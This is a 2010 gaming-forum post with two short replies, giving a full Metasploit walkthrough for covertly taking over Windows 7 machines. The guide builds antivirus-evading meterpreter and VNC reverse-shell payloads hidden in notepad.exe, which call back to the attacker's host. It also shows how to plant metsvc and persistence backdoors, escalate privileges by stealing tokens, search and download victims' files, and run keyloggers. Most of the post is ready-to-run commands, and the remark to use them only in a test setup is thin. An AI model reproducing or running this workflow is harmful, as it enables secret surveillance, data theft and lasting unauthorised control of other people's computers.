GoldenGaming

Welcome to GoldenGaming. We appreciate your support and hope that you be an active member. Don't Forget To Sign Up!

Welcome to Golden Gaming
Contact an Admin or Moderator for any issues you have
We Are Purchasing A Domain After 100 Members!
You can now use symbols in your username, just don't forget them!

    Inflitrating in Windows7

    Share
    avatar
    I Am Programmer
    Rookie User
    Rookie User

    Posts : 20

    Inflitrating in Windows7

    Post  I Am Programmer on Thu Dec 09, 2010 3:52 pm

    Infiltrating in Windows7
    Hi ppl... I'm gonna show you how to infiltrate in Windows 7 x64 or x86...
    GUIDE EXPLANATION:
    Text in {} = Titles
    # In front of text = Info
    Text in [] = Your Input

    # Here are some examples on [] from the guide beneath:

    # set LHOST [IP ADRESS INT.] = set LHOST 192.168.1.15

    # rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

    # search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

    # So when you input anything where there is [], remember to remove the []

    First start Back|Track
    {Shell 1} (Creating Exploit)
    Open the konsole

    Code:
    cd /pentest/exploits/framework3
    svn up
    # To update the metasploit framework
    clear

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | \
    ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
    ./msfencode -e x86/countdown -c 2 -t raw | \
    ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
    ./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o /root/payload.exe

    # If you get encoder error find another EXE or try to encode it less time

    # Copy payload to target

    # If you want to use this over the internet remember to use your external ip instead of using your internal IP and redirect the ports to your computer
    =================================

    {Shell 2} (Using Exploit)
    Code:
    cd /pentest/exploits/framework3/

    clear

    ./msfconsole
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST [IP ADRESS INT.]
    set LPORT [PORT] (if used in msfpayload in Shell 1)
    show options
    exploit



    # Once more you you gonna use this on the internet this time use your internal IP not the external one...
    # Now we wait for connection, so start the payload on victim computer
    =================================

    DO NOT CLOSE the meterpreter connection/console we need it to upload the VNCinject...
    {Shell3}[Preparing the VNCinject payload]
    Code:
    cd /pentest/exploits/framework3/

    clear

    ./msfpayload windows/vncinject/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | \
    ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
    ./msfencode -e x86/countdown -c 2 -t raw | \
    ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
    ./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o /root/vncinject.exe


    #I recommend to use a different port from the one used in shell1
    ==============================
    {Shell4}[Using VNCinject]
    In a different Metasploit Console (REMEMBER DO NOT CLOSE the one with the meterpreter connection)
    Code:
    use exploit/multi/handler
    set PAYLOAD windows/vncinject/reverse_tcp
    set LHOST [IP ADRESS INT.]
    set LPORT [PORT] (if used in msfpayload in Shell 3)
    show options
    exploit


    # Now in meterpreter console...
    Code:
    upload /root/vncinject.exe C:\\Users\\[username]\\Documents\\vncinject.exe


    # In the local dir you must only use one "/" and on the remote you must use 2 ""
    #Now let's execute the VNCinject.exe
    In the meterpreter console...
    Code:
    execute -f c:\\Users\\[username]\\Documents\\vncinject.exe


    Now you wait and it will show the remote desktop... the user don't know that you are spying him... and you have the control of the computer... keyboard and mouse... and you can upload and download files through the meterpreter console
    ================================
    {Setting up backdoors for future use} (when in meterpreter console)
    Code:
    run metsvc (set backdoor for next time you want in)

    (OR THIS)

    run persistence -r [YOUR IP ADRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
    # 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info

    ***UP- AND DOWNSIDES USING THIS***

    METSVC:
    VERY BAD: All 3 files is use gets flagged by Norton Internet Security 2011 as trojan, maybe other AV's will do this too!
    BAD: If ip change you have to know the IP to connect back to Victim
    GOOD: Easy to use
    GOOD: It dosn't request YOUR IP and port!

    PERSISTENCE:
    BAD: It requests YOUR IP and port!
    BAD: Can be more "difficult" to use
    GOOD: Flexible
    GOOD: Auto Connect
    ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) it is detected as bad, and will be removed. and that's a tool you must download!

    -------------------------------------

    {GET BACK INTO SYSTEM} (using metsvc in a new terminal)
    Code:
    cd /pentest/exploits/framework3/

    svn up

    clear

    ./msfconsole

    use exploit/multi/handler

    set PAYLOAD windows/metsvc_bind_tcp

    set LPORT 31337 (Must be this port of what i know)

    set RHOST [VICTIM IP ADRESS]

    show options (see if your setup is correct)

    exploit


    ------------------------------------

    {GET BACK INTO SYSTEM} (using persistence in a new terminal)
    Code:
    cd /pentest/exploits/framework3/

    svn up

    clear

    ./msfconsole

    use exploit/multi/handler

    set PAYLOAD windows/meterpreter/reverse_tcp

    set LHOST [IP ADRESS INT.]

    set LPORT [PORT]
    # The port set in persistence backdoor

    show options

    exploit

    ----------
    # Now we wait for connection, it will reconnect to your computer within 300 sec
    ----------
    Code:
    getuid
    # If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":

    ps
    # Find PID on explorer.exe

    steal_token [NUMBER - PID on explorer]
    # From what i know it grants you the same rights as the user running that process

    use priv

    get system


    Some useful commands for meterpreter
    Code:
    search -f *.jpg
    # Finding all JPG files on the system

    search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
    # Finding all JPG filen i a specific folder

    searct -f test.txt
    # Find a specific file on the whole system


    {Uploading and Downloading} (How I use it)
    # Use "ls", "pwd" and "cd" to navigate around - see below under commands

    Explanation:
    Create a txt file on yout BT4 desktop and write any thing in it, or nothing, and save it with the name "test.txt" then in terminal in meterpreter console (after your connected to victim), navigate to the desktop of the user currently logged in.
    Use "pwd" without quotes, to check if the path is correct, if it is type the following

    {Upload}
    Code:
    upload /root/test.txt test.txt

    # and if you are uploading a file with space in it's name:

    upload "/root/test 2.txt" "test 2.txt"

    # Or if your not in the path where you want to upload a file, and want it to be uploaded to another folder

    upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
    # Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"

    {Download}

    Explanation:
    Now we are going to download the file we just uploaded the "test.txt". Navigate to the folder if your not already in it, by using the "cd", "pwd" and "ls" commands.

    Then type:
    Code:
    download test.txt /root/test.txt

    # And if you are downloading a file with space in it's name

    download "test 2.txt" "/root/test 2.txt"

    # Or if your not in the path where you want to download a file from, but know the exact path and name by using search

    download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
    # Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"




    {Commands} (meterpreter console)

    help
    # USE THIS!!! thats mostly how i got this knowledge and then googled the commands to get more info on them

    screenshot
    # No need to say what it does - remember you must have used "use priv" in meterpreter first

    cd [DRIVE:\\FOLDER\\FOLDER]
    # You get it - Change directory

    pwd
    # Show what directory your in

    ls
    # List Current Directory

    upload
    # See above

    download
    # See above

    search
    # See above and Meterpreter Search This can be used in diff. consoles!

    keyscan_start
    # Key Sniffer - Start

    keyscan_dump
    # Key Sniffer - dump keys while running

    keyscan_stop
    # Key Sniffer - Stop


    Few words from me:

    First i will say, USE THIS AT YOUR OWN RISK! Do not blame me for anything. DO NOT misuse this information, only use this in a test setup!

    Do your legwork before asking, i just gave you a complete detailed guide from start to finish, on a silver platter.

    As always, if you have any questions, google it first and then google it some more, and THEN ask for directions, not the solution!
    avatar
    AoD GhostGFX
    Advertiser
    Advertiser

    Posts : 26

    Re: Inflitrating in Windows7

    Post  AoD GhostGFX on Thu Dec 09, 2010 5:44 pm

    nice , you heard of GodMode ?
    avatar
    I Am Programmer
    Rookie User
    Rookie User

    Posts : 20

    Re: Inflitrating in Windows7

    Post  I Am Programmer on Thu Dec 09, 2010 5:56 pm

    Yes, why do you ask?

    Sponsored content

    Re: Inflitrating in Windows7

    Post  Sponsored content


      Current date/time is Tue Jul 25, 2017 4:37 am